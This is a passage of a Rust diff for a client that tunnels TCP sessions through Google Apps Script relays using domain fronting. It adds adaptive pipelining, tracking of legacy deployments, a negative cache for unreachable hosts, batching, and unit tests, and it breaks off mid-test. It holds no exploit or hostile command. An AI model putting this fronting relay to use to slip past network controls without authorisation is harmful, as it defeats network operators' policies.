+                if !eof_seen && inflight.len() < max_inflight {
+                    refill_steps += 1;
+
+                    if refill_steps >= 10 {
+                        // Check buffered upload first — merge into a data
+                        // op instead of sending an empty poll.
+                        if let Some(data) = buffered_upload.take() {
+                            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        } else {
+                            let (meta, reply_rx) = send_empty_poll(sid, &mut next_send_seq, mux);
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        }
+                        refill_steps = 0;
+
+                        if inflight.len() < max_inflight && max_inflight > INFLIGHT_IDLE {
+                            refill_at = Some(Box::pin(tokio::time::sleep(Duration::from_millis(100))));
+                        }
+                    } else {
+                        refill_at = Some(Box::pin(tokio::time::sleep(Duration::from_millis(100))));
+                    }
+                }
+            }
+
+            // Process completed replies.
+            Some((meta, outcome)) = inflight.next() => {
+                match outcome {
+                    ReplyOutcome::Ok(resp, script_id) => {
+                        let has_data = resp.d.as_ref().map(|d| !d.is_empty()).unwrap_or(false);
+                        tracing::debug!(
+                            "sess {}: recv seq={}, rtt={:?}, data={}, inflight={}",
+                            &sid[..sid.len().min(8)],
+                            meta.seq,
+                            meta.send_at.elapsed(),
+                            has_data,
+                            inflight.len(),
+                        );
+                        if resp.seq.is_none() {
+                            max_inflight = 1;
+                        }
+
+                        if let Some(ref e) = resp.e {
+                            tracing::debug!("tunnel error: {}", e);
+                            break;
+                        }
+
+                        let is_eof = resp.eof.unwrap_or(false);
+                        let resp_has_seq = resp.seq.is_some();
+
+                        // Write in-order to client.
+                        if meta.seq == next_write_seq {
+                            let got_data = match write_tunnel_response(&mut writer, &resp).await? {
+                                WriteOutcome::Wrote => true,
+                                WriteOutcome::NoData => false,
+                                WriteOutcome::BadBase64 => break,
+                            };
+                            next_write_seq += 1;
+                            if got_data {
+                                consecutive_empty = 0;
+                                consecutive_data = consecutive_data.saturating_add(1);
+                                let bytes = resp.d.as_ref().map(|d| d.len() as u64 * 3 / 4).unwrap_or(0);
+                                total_download_bytes += bytes;
+                            } else {
+                                consecutive_empty = consecutive_empty.saturating_add(1);
+                            }
+                            if is_eof {
+                                eof_seen = true;
+                            }
+
+                            // Flush buffered out-of-order writes.
+                            while let Some(entry) = pending_writes.first_entry() {
+                                if *entry.key() != next_write_seq { break; }
+                                let (_, (buffered_resp, _)) = entry.remove_entry();
+                                let buf_eof = buffered_resp.eof.unwrap_or(false);
+                                match write_tunnel_response(&mut writer, &buffered_resp).await? {
+                                    WriteOutcome::Wrote => {
+                                        consecutive_empty = 0;
+                                        consecutive_data = consecutive_data.saturating_add(1);
+                                        let bytes = buffered_resp.d.as_ref().map(|d| d.len() as u64 * 3 / 4).unwrap_or(0);
+                                        total_download_bytes += bytes;
+                                    }
+                                    WriteOutcome::NoData => {
+                                        consecutive_empty = consecutive_empty.saturating_add(1);
+                                    }
+                                    WriteOutcome::BadBase64 => break,
+                                }
+                                next_write_seq += 1;
+                                if buf_eof {
+                                    eof_seen = true;
+                                }
+                            }
+                        } else {
+                            pending_writes.insert(meta.seq, (resp, script_id));
+                        }
+
+                        // Send buffered upload data now that a slot freed up.
+                        if let Some(data) = buffered_upload.take() {
+                            if inflight.len() < max_inflight {
+                                let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                                consecutive_empty = 0;
+                                inflight.push(wrap_reply(meta, reply_rx));
+                            } else {
+                                buffered_upload = Some(data);
+                            }
+                        }
+
+                        // Adaptive pipeline depth management.
+                        tracing::info!(
+                            "sess {}: depth={} cd={} ce={} inf={} has_seq={}",
+                            &sid[..sid.len().min(8)],
+                            max_inflight, consecutive_data, consecutive_empty, inflight.len(), resp_has_seq,
+                        );
+                        if resp_has_seq {
+                            let prev = max_inflight;
+                            if consecutive_empty >= 2 && max_inflight > INFLIGHT_IDLE {
+                                max_inflight = INFLIGHT_IDLE.min(inflight_cap);
+                                if is_elevated {
+                                    let n = mux.elevated_sessions.fetch_sub(1, Ordering::Relaxed);
+                                    pipeline_debug::set_elevated(n.saturating_sub(1));
+                                    is_elevated = false;
+                                }
+                            } else if consecutive_data >= 1 && max_inflight < INFLIGHT_OPTIMIST {
+                                max_inflight = INFLIGHT_OPTIMIST.min(inflight_cap);
+                            } else if consecutive_data >= 2
+                                && max_inflight >= INFLIGHT_OPTIMIST
+                                && max_inflight < inflight_cap
+                                && total_download_bytes >= 32 * 1024
+                            {
+                                if !is_elevated {
+                                    let cur = mux.elevated_sessions.load(Ordering::Relaxed);
+                                    if cur < mux.max_elevated {
+                                        let n = mux.elevated_sessions.fetch_add(1, Ordering::Relaxed);
+                                        pipeline_debug::set_elevated(n + 1);
+                                        is_elevated = true;
+                                        max_inflight = (max_inflight + 1).min(inflight_cap);
+                                    }
+                                } else {
+                                    max_inflight = (max_inflight + 1).min(inflight_cap);
+                                }
+                            }
+                            pipeline_debug::session_update(sid, max_inflight, inflight.len(), is_elevated);
+                            if max_inflight != prev {
+                                tracing::info!(
+                                    "sess {}: pipeline {} -> {}{}",
+                                    &sid[..sid.len().min(8)],
+                                    prev,
+                                    max_inflight,
+                                    if is_elevated { " [elevated]" } else { "" },
+                                );
+                                pipeline_debug::push_event(format!(
+                                    "{} {}->{}{}",
+                                    &sid[..sid.len().min(8)],
+                                    prev,
+                                    max_inflight,
+                                    if is_elevated { " E" } else { "" },
+                                ));
+                            }
+                        }
+
+                        // Schedule refill if pipeline needs more polls.
+                        if !eof_seen
+                            && inflight.len() < max_inflight
+                            && refill_at.is_none()
+                        {
+                            refill_at = Some(Box::pin(tokio::time::sleep(
+                                if max_inflight > INFLIGHT_IDLE { Duration::from_millis(100) } else { Duration::ZERO }
+                            )));
+                            refill_steps = 0;
+                        }
+                    }
+                    ReplyOutcome::BatchErr(e) => {
+                        tracing::debug!("tunnel data error: {}", e);
+                        break;
+                    }
+                    ReplyOutcome::Timeout => {
+                        tracing::warn!(
+                            "sess {}: reply timeout (seq {}), retrying",
+                            &sid[..sid.len().min(8)],
+                            meta.seq,
+                        );
+                        consecutive_empty = consecutive_empty.saturating_add(1);
+                    }
+                    ReplyOutcome::Dropped => {
+                        break;
+                    }
+                }
+            }
+
+            // Read from client (overlapped with reply processing).
+            result = async {
+                read_buf.reserve(65536);
+                reader.read_buf(&mut read_buf).await
+            }, if can_read => {
+                match result {
+                    Ok(0) => {
+                        client_closed = true;
+                    }
+                    Ok(n) => {
+                        let data = extract_bytes(&mut read_buf, n);
+                        if inflight.len() < max_inflight {
+                            // Normal path: send immediately as data op.
+                            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                            consecutive_empty = 0;
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        } else if inflight.len() < max_inflight + 4 {
+                            // Fast-path: pipeline full but under +4 extra.
+                            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                            consecutive_empty = 0;
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        } else {
+                            // Buffer upload data until a slot frees up.
+                            if let Some(ref mut existing) = buffered_upload {
+                                // Merge: append new data to existing buffer.
+                                let mut merged = BytesMut::with_capacity(existing.len() + data.len());
+                                merged.extend_from_slice(existing);
+                                merged.extend_from_slice(&data);
+                                *existing = merged.freeze();
+                            } else {
+                                buffered_upload = Some(data);
+                            }
+                        }
+                    }
+                    Err(_) => {
+                        client_closed = true;
+                    }
+                }
+            }
         }
     }
 
+    // Release elevation permit.
+    if is_elevated {
+        let n = mux.elevated_sessions.fetch_sub(1, Ordering::Relaxed);
+        pipeline_debug::set_elevated(n.saturating_sub(1));
+    }
     Ok(())
 }
 
@@ -982,6 +1922,20 @@ where
     }
 }
 
+/// Extract bytes from the read buffer, applying the zero-copy threshold.
+/// Reads >= half the buffer use split+freeze (zero-copy); smaller reads
+/// copy out and clear so the buffer allocation is reused.
+fn extract_bytes(buf: &mut BytesMut, n: usize) -> Bytes {
+    const ZERO_COPY_THRESHOLD: usize = 65536 / 2;
+    if n >= ZERO_COPY_THRESHOLD {
+        buf.split().freeze()
+    } else {
+        let owned = Bytes::copy_from_slice(&buf[..n]);
+        buf.clear();
+        owned
+    }
+}
+
 pub fn decode_udp_packets(resp: &TunnelResponse) -> Result<Vec<Vec<u8>>, String> {
     let Some(pkts) = resp.pkts.as_ref() else {
         return Ok(Vec::new());
@@ -1010,6 +1964,7 @@ mod tests {
             eof: None,
             e: e.map(str::to_string),
             code: code.map(str::to_string),
+            seq: None,
         }
     }
 
@@ -1069,6 +2024,133 @@ mod tests {
         )));
     }
 
+    #[test]
+    fn unreachable_error_str_matches_expected_variants() {
+        assert!(is_unreachable_error_str(
+            "connect failed: Network is unreachable (os error 101)"
+        ));
+        assert!(is_unreachable_error_str("No route to host"));
+        assert!(is_unreachable_error_str("os error 113"));
+        // Case-insensitive.
+        assert!(is_unreachable_error_str(
+            "CONNECT FAILED: NETWORK IS UNREACHABLE"
+        ));
+    }
+
+    #[test]
+    fn unreachable_error_str_rejects_unrelated() {
+        assert!(!is_unreachable_error_str("connection refused"));
+        assert!(!is_unreachable_error_str("connect timed out"));
+        assert!(!is_unreachable_error_str("connection reset by peer"));
+        assert!(!is_unreachable_error_str(""));
+    }
+
+    #[test]
+    fn negative_cache_records_and_short_circuits() {
+        let (mux, _rx) = mux_for_test();
+        // Initially nothing is cached.
+        assert!(!mux.is_unreachable("ds6.probe.example", 443));
+        // Record a matching error.
+        mux.record_unreachable_if_match(
+            "ds6.probe.example",
+            443,
+            "connect failed: Network is unreachable (os error 101)",
+        );
+        assert!(mux.is_unreachable("ds6.probe.example", 443));
+        // A different port for the same host is its own entry.
+        assert!(!mux.is_unreachable("ds6.probe.example", 80));
+    }
+
+    #[test]
+    fn negative_cache_ignores_non_unreachable_errors() {
+        let (mux, _rx) = mux_for_test();
+        mux.record_unreachable_if_match(
+            "example.com",
+            443,
+            "connect failed: connection refused",
+        );
+        assert!(!mux.is_unreachable("example.com", 443));
+    }
+
+    #[test]
+    fn negative_cache_normalizes_host_keys() {
+        let (mux, _rx) = mux_for_test();
+        // Cache under one casing/format...
+        mux.record_unreachable_if_match(
+            "Example.COM.",
+            443,
+            "Network is unreachable (os error 101)",
+        );
+        // ...and look up under several equivalent forms.
+        assert!(mux.is_unreachable("example.com", 443));
+        assert!(mux.is_unreachable("EXAMPLE.com", 443));
+        assert!(mux.is_unreachable("example.com.", 443));
+        // Different host should still miss.
+        assert!(!mux.is_unreachable("other.com", 443));
+    }
+
+    /// Outer `Ok(Err(_))` from the mux channel means "the relay never
+    /// reached the tunnel-node" (HTTP/TLS to Apps Script failed, batch
+    /// timed out, etc.) — the destination wasn't even attempted. Even if
+    /// that error string contains "Network is unreachable" (e.g. the
+    /// client device's WAN was momentarily down), it must NOT poison the
+    /// destination cache, or every host the user touched during a
+    /// connectivity blip stays refused for 30s.
+    #[tokio::test]
+    async fn negative_cache_skips_outer_relay_errors() {
+        let (mux, mut rx) = mux_for_test();
+        let mux_for_task = mux.clone();
+        let task = tokio::spawn(async move {
+            connect_plain("real.target.example", 443, &mux_for_task).await
+        });
+
+        // Receive the Connect msg and reply with an outer Err whose string
+        // would otherwise match `is_unreachable_error_str`.
+        let msg = rx.recv().await.expect("connect msg");
+        let reply = match msg {
+            MuxMsg::Connect { reply, .. } => reply,
+            other => panic!("expected Connect, got {:?}", std::mem::discriminant(&other)),
+        };
+        let _ = reply.send(Err(
+            "relay failed: Network is unreachable (os error 101)".into(),
+        ));
+
+        let res = task.await.expect("task");
+        assert!(res.is_err(), "connect_plain should surface the error");
+        assert!(
+            !mux.is_unreachable("real.target.example", 443),
+            "outer relay error must not negative-cache the destination"
+        );
+    }
+
+    #[test]
+    fn negative_cache_enforces_hard_cap_under_unique_burst() {
+        let (mux, _rx) = mux_for_test();
+        // Insert enough unique still-live entries to exceed the cap. The
+        // map size must never exceed UNREACHABLE_CACHE_MAX, even though
+        // every entry is fresh and `retain(expired)` prunes nothing.
+        let burst = UNREACHABLE_CACHE_MAX + 50;
+        for i in 0..burst {
+            let host = format!("h{}.example", i);
+            mux.record_unreachable_if_match(
+                &host,
+                443,
+                "connect failed: Network is unreachable (os error 101)",
+            );
+        }
+        let len = mux
+            .unreachable_cache
+            .lock()
+            .map(|g| g.len())
+            .unwrap_or(0);
+        assert!(
+            len <= UNREACHABLE_CACHE_MAX,
+            "cache size {} exceeded cap {}",
+            len,
+            UNREACHABLE_CACHE_MAX
+        );
+    }
+
     #[test]
     fn server_speaks_first_covers_common_protocols() {
         for p in [21u16, 22, 25, 80, 110, 143, 587] {
@@ -1090,22 +2172,80 @@ mod tests {
     /// Build a TunnelMux whose send channel is exposed to the test rather
     /// than wired to a real DomainFronter. Lets tests assert what messages
     /// the client would emit without needing network or apps_script.
-    fn mux_for_test() -> (Arc<TunnelMux>, mpsc::Receiver<MuxMsg>) {
-        let (tx, rx) = mpsc::channel(16);
+    fn mux_for_test() -> (Arc<TunnelMux>, mpsc::UnboundedReceiver<MuxMsg>) {
+        mux_for_test_with(2)
+    }
+
+    /// Build a TunnelMux for tests with a specific deployment count. The
+    /// per-deployment legacy state's aggregate gate (`all_servers_legacy`)
+    /// requires `legacy_deployments.len() == num_scripts`, so tests that
+    /// exercise that gate need to control how many "deployments" exist.
+    fn mux_for_test_with(num_scripts: usize) -> (Arc<TunnelMux>, mpsc::UnboundedReceiver<MuxMsg>) {
+        let (tx, rx) = mpsc::unbounded_channel();
         let mux = Arc::new(TunnelMux {
             tx,
             connect_data_unsupported: Arc::new(AtomicBool::new(false)),
-            server_no_longpoll: Arc::new(AtomicBool::new(false)),
+            legacy_deployments: Mutex::new(HashMap::new()),
+            all_legacy: Arc::new(AtomicBool::new(false)),
+            num_scripts,
             preread_win: AtomicU64::new(0),
             preread_loss: AtomicU64::new(0),
             preread_skip_port: AtomicU64::new(0),
             preread_skip_unsupported: AtomicU64::new(0),
             preread_win_total_us: AtomicU64::new(0),
             preread_total_events: AtomicU64::new(0),
+            unreachable_cache: Mutex::new(HashMap::new()),
+            // Tests that exercise the reply-timeout path expect a
+            // generous fixed value here; production derives this from
+            // `fronter.batch_timeout()` (see `TunnelMux::start`).
+            reply_timeout: Duration::from_secs(35),
+            elevated_sessions: AtomicU64::new(0),
+            max_elevated: MAX_ELEVATED_PER_DEPLOYMENT * num_scripts as u64,
         });
         (mux, rx)
     }
 
+    /// `TunnelMux::reply_timeout` must co-vary with the configured
+    /// `request_timeout_secs` plus `REPLY_TIMEOUT_SLACK`. Without this
+    /// runtime derivation, operators who raise `request_timeout_secs`
+    /// see sessions abandon `reply_rx` just before `fire_batch`'s
+    /// HTTP round-trip would have completed — silently orphaning
+    /// in-flight responses. The test muxes hardcode a value for
+    /// convenience, so a regression in `TunnelMux::start`'s formula
+    /// could ship unnoticed unless we exercise the real construction
+    /// path.
+    #[tokio::test]
+    async fn mux_reply_timeout_tracks_batch_timeout_plus_slack() {
+        use crate::config::Config;
+
+        // Pick a non-default `request_timeout_secs` so the assertion
+        // would fail under any hardcoded value (35 s in tests, 75 s in
+        // the previous patch).
+        let cfg: Config = serde_json::from_str(
+            r#"{
+                "mode": "apps_script",
+                "google_ip": "127.0.0.1",
+                "front_domain": "www.google.com",
+                "script_id": "TEST",
+                "auth_key": "test_auth_key",
+                "listen_host": "127.0.0.1",
+                "listen_port": 8085,
+                "log_level": "info",
+                "verify_ssl": true,
+                "request_timeout_secs": 60
+            }"#,
+        )
+        .unwrap();
+        let fronter = Arc::new(DomainFronter::new(&cfg).expect("test fronter must construct"));
+        let mux = TunnelMux::start(fronter, 0, 0);
+
+        assert_eq!(
+            mux.reply_timeout(),
+            Duration::from_secs(60) + REPLY_TIMEOUT_SLACK,
+            "reply_timeout must equal batch_timeout + REPLY_TIMEOUT_SLACK"
+        );
+    }
+
     /// The buffered ClientHello from the pre-read window must reach the
     /// tunnel-node as the first `Data` op on the fallback path. If this
     /// regresses, every TLS handshake stalls until the 30 s read-timeout
@@ -1122,14 +2262,17 @@ mod tests {
         let addr = listener.local_addr().unwrap();
         let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 });
         let _client = TcpStream::connect(addr).await.unwrap();
-        let mut server_side = accept.await.unwrap();
+        let server_side = accept.await.unwrap();
 
         let (mux, mut rx) = mux_for_test();
-        let pending = Some(b"CLIENTHELLO".to_vec());
+        let pending = Some(Bytes::from_static(b"CLIENTHELLO"));
 
         let loop_handle = tokio::spawn({
             let mux = mux.clone();
-            async move { tunnel_loop(&mut server_side, "sid-under-test", &mux, pending).await }
+            async move {
+                let mut server_side = server_side;
+                tunnel_loop(&mut server_side, "sid-under-test", &mux, pending).await
+            }
         });
 
         // The first message tunnel_loop emits must be Data carrying the
@@ -1140,18 +2283,22 @@ mod tests {
             .expect("mux channel closed unexpectedly");
 
         match msg {
-            MuxMsg::Data { sid, data, reply } => {
+            MuxMsg::Data { sid, data, reply, .. } => {
                 assert_eq!(sid, "sid-under-test");
                 assert_eq!(&data[..], b"CLIENTHELLO");
                 // Reply with eof so tunnel_loop unwinds cleanly.
-                let _ = reply.send(Ok(TunnelResponse {
-                    sid: Some("sid-under-test".into()),
-                    d: None,
-                    pkts: None,
-                    eof: Some(true),
-                    e: None,
-                    code: None,
-                }));
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-under-test".into()),
+                        d: None,
+                        pkts: None,
+                        eof: Some(true),
+                        e: None,
+                        code: None,
+                        seq: Some(0),
+                    },
+                    "test-script".to_string(),
+                )));
             }
             other => panic!(
                 "first mux message was not Data (expected replay); got {:?}",
@@ -1166,6 +2313,106 @@ mod tests {
             ),
         }
 
+        // With pipelining (INFLIGHT_OPTIMIST=2), the second op is
+        // launched after a 1 s stagger sleep, so we need to wait long
+        // enough for it to arrive. Reply to any remaining messages so the
+        // loop can exit cleanly.
+        let mut seq = 1u64;
+        while let Ok(Some(msg)) = tokio::time::timeout(Duration::from_millis(1500), rx.recv()).await {
+            if let MuxMsg::Data { reply, .. } = msg {
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-under-test".into()),
+                        d: None, pkts: None, eof: Some(true),
+                        e: None, code: None, seq: Some(seq),
+                    },
+                    "test-script".to_string(),
+                )));
+                seq += 1;
+            }
+        }
+
+        let _ = tokio::time::timeout(Duration::from_secs(4), loop_handle)
+            .await
+            .expect("tunnel_loop did not exit after eof");
+    }
+
+    /// Regression for the mixed-mode stall: A is legacy, B is long-poll
+    /// capable, the session's last reply came from A. A naive per-
+    /// deployment skip (gated on the *previous* reply's `script_id`)
+    /// would short-circuit every empty poll on this session — so B
+    /// never gets a chance to long-poll for us, and remote→client data
+    /// stalls until either the local client sends bytes or A's TTL
+    /// expires. The fix gates skip-when-idle on the aggregate
+    /// `all_servers_legacy()` instead, so the loop keeps emitting empty
+    /// polls whenever at least one peer can still hold the request open.
+    /// Replies are paced via `start_paused` time auto-advance — without
+    /// it the test would take ~2 s of real wall-clock time per session.
+    #[tokio::test(start_paused = true)]
+    async fn tunnel_loop_keeps_polling_when_only_some_deployments_legacy() {
+        use tokio::net::TcpListener;
+
+        let listener = TcpListener::bind(("127.0.0.1", 0)).await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 });
+        let _client = TcpStream::connect(addr).await.unwrap();
+        let server_side = accept.await.unwrap();
+
+        // 2 deployments, only A marked legacy → all_servers_legacy = false.
+        let (mux, mut rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+        assert!(!mux.all_servers_legacy());
+
+        let loop_handle = tokio::spawn({
+            let mux = mux.clone();
+            async move {
+                let mut server_side = server_side;
+                tunnel_loop(&mut server_side, "sid-mixed", &mux, None).await
+            }
+        });
+
+        // Reply to 6 empty polls, all from A. With the regression
+        // (per-deployment skip on `last_script_id == A`), the loop would
+        // stop emitting at iteration 4 — `consecutive_empty > 3` plus
+        // `last_was_legacy` would short-circuit the send. With the fix,
+        // the aggregate gate stays false and the loop keeps polling.
+        // The 60 s timeout below is paused-time, so it only "elapses"
+        // if rx.recv() truly never resolves (i.e. the loop has stalled).
+        let mut received = 0u32;
+        while received < 6 {
+            let msg = tokio::time::timeout(Duration::from_secs(60), rx.recv())
+                .await
+                .unwrap_or_else(|_| panic!(
+                    "loop stopped emitting at iteration {} — regression: per-deployment skip-when-idle stalled session even though long-poll-capable peer was available",
+                    received
+                ))
+                .expect("mux channel closed unexpectedly");
+            match msg {
+                MuxMsg::Data { sid, data, seq, reply, .. } => {
+                    assert_eq!(sid, "sid-mixed");
+                    assert!(data.is_empty(), "expected empty poll, got {} bytes", data.len());
+                    let last = received == 5;
+                    let _ = reply.send(Ok((
+                        TunnelResponse {
+                            sid: Some("sid-mixed".into()),
+                            d: None,
+                            pkts: None,
+                            eof: if last { Some(true) } else { None },
+                            e: None,
+                            code: None,
+                            seq,
+                        },
+                        "script-A".to_string(),
+                    )));
+                    received += 1;
+                }
+                _ => panic!(
+                    "iteration {}: expected Data poll, got a different MuxMsg variant",
+                    received
+                ),
+            }
+        }
+
         let _ = tokio::time::timeout(Duration::from_secs(2), loop_handle)
             .await
             .expect("tunnel_loop did not exit after eof");
@@ -1185,19 +2432,316 @@ mod tests {
         assert!(mux.connect_data_unsupported());
     }
 
-    /// `server_no_longpoll` must be sticky too: once we see a legacy
-    /// fast-empty reply, every subsequent session uses the legacy idle
-    /// cadence (long read timeout + skip-empty) for the rest of the
-    /// process. Flipping it back per-session would either thrash the
-    /// cadence or double the detection cost.
+    /// Marking deployment A as legacy must NOT make B look legacy. This
+    /// is the central guarantee of the per-deployment design: with the
+    /// old global AtomicBool, one slow / legacy deployment dragged every
+    /// session onto the 30 s legacy cadence even when the other 7 were
+    /// long-polling fine.
     #[test]
-    fn no_longpoll_cache_is_sticky() {
-        let (mux, _rx) = mux_for_test();
-        assert!(!mux.server_no_longpoll());
-        mux.mark_server_no_longpoll();
-        assert!(mux.server_no_longpoll());
-        mux.mark_server_no_longpoll(); // idempotent
-        assert!(mux.server_no_longpoll());
+    fn legacy_state_is_per_deployment() {
+        let (mux, _rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+
+        let deps = mux.legacy_deployments.lock().unwrap();
+        assert!(deps.contains_key("script-A"));
+        assert!(
+            !deps.contains_key("script-B"),
+            "marking A must not insert an entry for B"
+        );
+    }
+
+    /// `all_servers_legacy` (the per-session 30 s read-timeout gate) flips
+    /// to true *only* when every known deployment has been marked. With
+    /// 2 deployments, marking one keeps the gate false; marking both
+    /// flips it true.
+    #[test]
+    fn all_servers_legacy_requires_every_deployment() {
+        let (mux, _rx) = mux_for_test_with(2);
+        assert!(!mux.all_servers_legacy());
+
+        mux.mark_server_no_longpoll("script-A");
+        assert!(
+            !mux.all_servers_legacy(),
+            "1 of 2 marked: aggregate must stay false"
+        );
+
+        mux.mark_server_no_longpoll("script-B");
+        assert!(
+            mux.all_servers_legacy(),
+            "all deployments marked: aggregate flips true"
+        );
+
+        // Idempotent re-mark of an already-legacy deployment doesn't
+        // disturb the aggregate.
+        mux.mark_server_no_longpoll("script-A");
+        assert!(mux.all_servers_legacy());
+    }
+
+    /// After `LEGACY_RECOVER_AFTER`, an entry is treated as expired and
+    /// the deployment rejoins the long-poll fast path. The next mark
+    /// (against any deployment) sweeps stale entries before recomputing
+    /// the aggregate gate, so a recovered peer doesn't keep counting
+    /// toward `all_legacy`. Backdating the mark time avoids a real 60 s
+    /// sleep in the test — same effect as the wall-clock moving forward.
+    #[test]
+    fn legacy_state_recovers_after_ttl() {
+        let (mux, _rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+
+        // Backdate A past LEGACY_RECOVER_AFTER, then mark B. B's mark
+        // must trigger a sweep that drops the stale A entry.
+        {
+            let mut deps = mux.legacy_deployments.lock().unwrap();
+            let stale = Instant::now()
+                .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1))
+                .expect("test environment should have a non-trivial monotonic clock");
+            deps.insert("script-A".to_string(), stale);
+        }
+        mux.mark_server_no_longpoll("script-B");
+
+        let deps = mux.legacy_deployments.lock().unwrap();
+        assert!(
+            !deps.contains_key("script-A"),
+            "expired entry must be swept on the next mark — otherwise stale legacy state never clears"
+        );
+        assert!(deps.contains_key("script-B"));
+    }
+
+    /// If every deployment is legacy and then time passes past
+    /// `LEGACY_RECOVER_AFTER` *without any new mark*, the aggregate gate
+    /// must self-correct on the next `all_servers_legacy()` call.
+    /// Without the in-place sweep on read, stale legacy marks would keep
+    /// the 30 s read-timeout active forever after every deployment
+    /// recovers.
+    #[test]
+    fn all_servers_legacy_self_corrects_when_entries_expire() {
+        let (mux, _rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+        mux.mark_server_no_longpoll("script-B");
+        assert!(mux.all_servers_legacy());
+
+        // Backdate every entry past TTL.
+        {
+            let mut deps = mux.legacy_deployments.lock().unwrap();
+            let stale = Instant::now()
+                .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1))
+                .expect("monotonic clock should be far enough along");
+            for (_, t) in deps.iter_mut() {
+                *t = stale;
+            }
+        }
+
+        assert!(
+            !mux.all_servers_legacy(),
+            "aggregate must self-correct when all entries expire — otherwise the 30 s read timeout sticks forever"
+        );
+    }
+
+    #[test]
+    fn should_fire_first_op_never_fires() {
+        // Empty accumulator: even a single op larger than the payload cap
+        // must not fire — there's nothing to fire yet, and the op gets
+        // added (it will simply be the only op in the next batch).
+        assert!(!should_fire(0, 0, 0));
+        assert!(!should_fire(0, 0, MAX_BATCH_PAYLOAD_BYTES + 1_000_000));
+    }
+
+    #[test]
+    fn should_fire_at_max_ops_threshold() {
+        // 49 already-queued ops + 50th: still fits (boundary is `>=`).
+        assert!(!should_fire(MAX_BATCH_OPS - 1, 0, 100));
+        // 50 already-queued ops + 51st: must fire.
+        assert!(should_fire(MAX_BATCH_OPS, 0, 100));
+        // Well past the cap: must fire.
+        assert!(should_fire(MAX_BATCH_OPS + 5, 0, 100));
+    }
+
+    #[test]
+    fn should_fire_when_payload_would_exceed_cap() {
+        // Exactly at the cap is fine — strict `>`.
+        assert!(!should_fire(
+            10,
+            MAX_BATCH_PAYLOAD_BYTES - 100,
+            100,
+        ));
+        // One byte over: fire.
+        assert!(should_fire(
+            10,
+            MAX_BATCH_PAYLOAD_BYTES - 100,
+            101,
+        ));
+        // Sum overflow well past the cap: fire.
+        assert!(should_fire(
+            10,
+            MAX_BATCH_PAYLOAD_BYTES,
+            1,
+        ));
+    }
+
+    /// Reply indices must point at the slot the op occupies *within its
+    /// batch*. Pre-flush ops are 0..N-1 in batch A; post-flush ops
+    /// restart at 0 in batch B. If this regresses, `fire_batch`'s
+    /// `batch_resp.r.get(idx)` lookup hands the wrong response (or
+    /// `None`) to the wrong session — silent data corruption that
+    /// the encode-layer tests can't catch.
+    #[tokio::test]
+    async fn batch_accum_reindexes_after_flush() {
+        // Stand-alone helper that mirrors `push_or_fire`'s push step
+        // without the fire_batch call — lets us simulate a flush with
+        // `mem::take` and assert the post-flush indexing without
+        // mocking the whole tunnel_request stack.
+        fn push_no_fire(
+            accum: &mut BatchAccum,
+            op: PendingOp,
+            op_bytes: usize,
+            reply: BatchedReply,
+        ) {
+            let idx = accum.pending_ops.len();
+            accum.pending_ops.push(op);
+            accum.data_replies.push((idx, reply));
+            accum.payload_bytes += op_bytes;
+        }
+
+        let mk_op = |sid: &str| PendingOp {
+            op: "data",
+            sid: Some(sid.into()),
+            host: None,
+            port: None,
+            data: Some(Bytes::from_static(b"x")),
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        let mk_reply = || oneshot::channel::<Result<(TunnelResponse, String), String>>().0;
+
+        let mut accum = BatchAccum::new();
+
+        // Batch A: 3 ops at indices 0, 1, 2.
+        push_no_fire(&mut accum, mk_op("a0"), 4, mk_reply());
+        push_no_fire(&mut accum, mk_op("a1"), 4, mk_reply());
+        push_no_fire(&mut accum, mk_op("a2"), 4, mk_reply());
+        assert_eq!(accum.pending_ops.len(), 3);
+        assert_eq!(
+            accum.data_replies.iter().map(|(i, _)| *i).collect::<Vec<_>>(),
+            vec![0, 1, 2],
+        );
+        assert_eq!(accum.payload_bytes, 12);
+
+        // Simulate the flush: take the queued state and reset the byte
+        // counter (matches what `push_or_fire` does after `fire_batch`).
+        let _flushed_ops = std::mem::take(&mut accum.pending_ops);
+        let _flushed_replies = std::mem::take(&mut accum.data_replies);
+        accum.payload_bytes = 0;
+
+        // Batch B: 2 ops, indices restart at 0.
+        push_no_fire(&mut accum, mk_op("b0"), 4, mk_reply());
+        push_no_fire(&mut accum, mk_op("b1"), 4, mk_reply());
+        assert_eq!(accum.pending_ops.len(), 2);
+        assert_eq!(
+            accum.data_replies.iter().map(|(i, _)| *i).collect::<Vec<_>>(),
+            vec![0, 1],
+            "post-flush indices must restart at 0 — otherwise fire_batch's \
+             batch_resp.r.get(idx) returns None and every session in the \
+             second batch sees a missing-response error"
+        );
+        assert_eq!(accum.payload_bytes, 8);
+    }
+
+    #[test]
+    fn encode_pending_data_op_with_payload_emits_base64() {
+        let op = PendingOp {
+            op: "data",
+            sid: Some("sid-1".into()),
+            host: None,
+            port: None,
+            data: Some(Bytes::from_static(b"hello")),
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        let b = encode_pending(op);
+        assert_eq!(b.op, "data");
+        assert_eq!(b.sid.as_deref(), Some("sid-1"));
+        assert_eq!(b.d.as_deref(), Some(B64.encode(b"hello").as_str()));
+    }
+
+    #[test]
+    fn encode_pending_omits_d_for_empty_polls_and_close() {
